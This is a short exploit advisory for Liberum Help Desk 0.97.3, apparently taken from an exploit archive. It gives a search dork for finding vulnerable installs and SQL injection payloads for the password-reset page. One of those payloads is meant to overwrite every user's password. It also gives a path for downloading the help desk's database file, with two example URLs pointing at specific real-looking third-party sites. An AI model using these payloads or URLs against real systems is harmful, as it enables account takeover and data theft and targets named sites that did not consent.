Liberum Help Desk version 0.97.3 suffers from remote SQL injection and database disclosure vulnerabilities.
5a3e430a6391cfcedc3fa0eb4548f25d72223181c7909bc5286ecedee96bc343
Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities
author : Cold z3ro, www.hackteach.org
Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem"
==============
[#] SQL Injection
http://www.site.com/[path]/forgotpass.asp
In uid insert SQL command's =>
SCMD ==> ' or '1=1
SCMD ==> ' or 'update tblusers set password = "z3ro"
all passwords will be z3ro
=============
[#] Database Disclosure
http://www.site.com/[path]/db/helpdesk2000.mdb
example :
https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb
http://www.ags2.com/helpdesk/db/helpdesk2000.mdb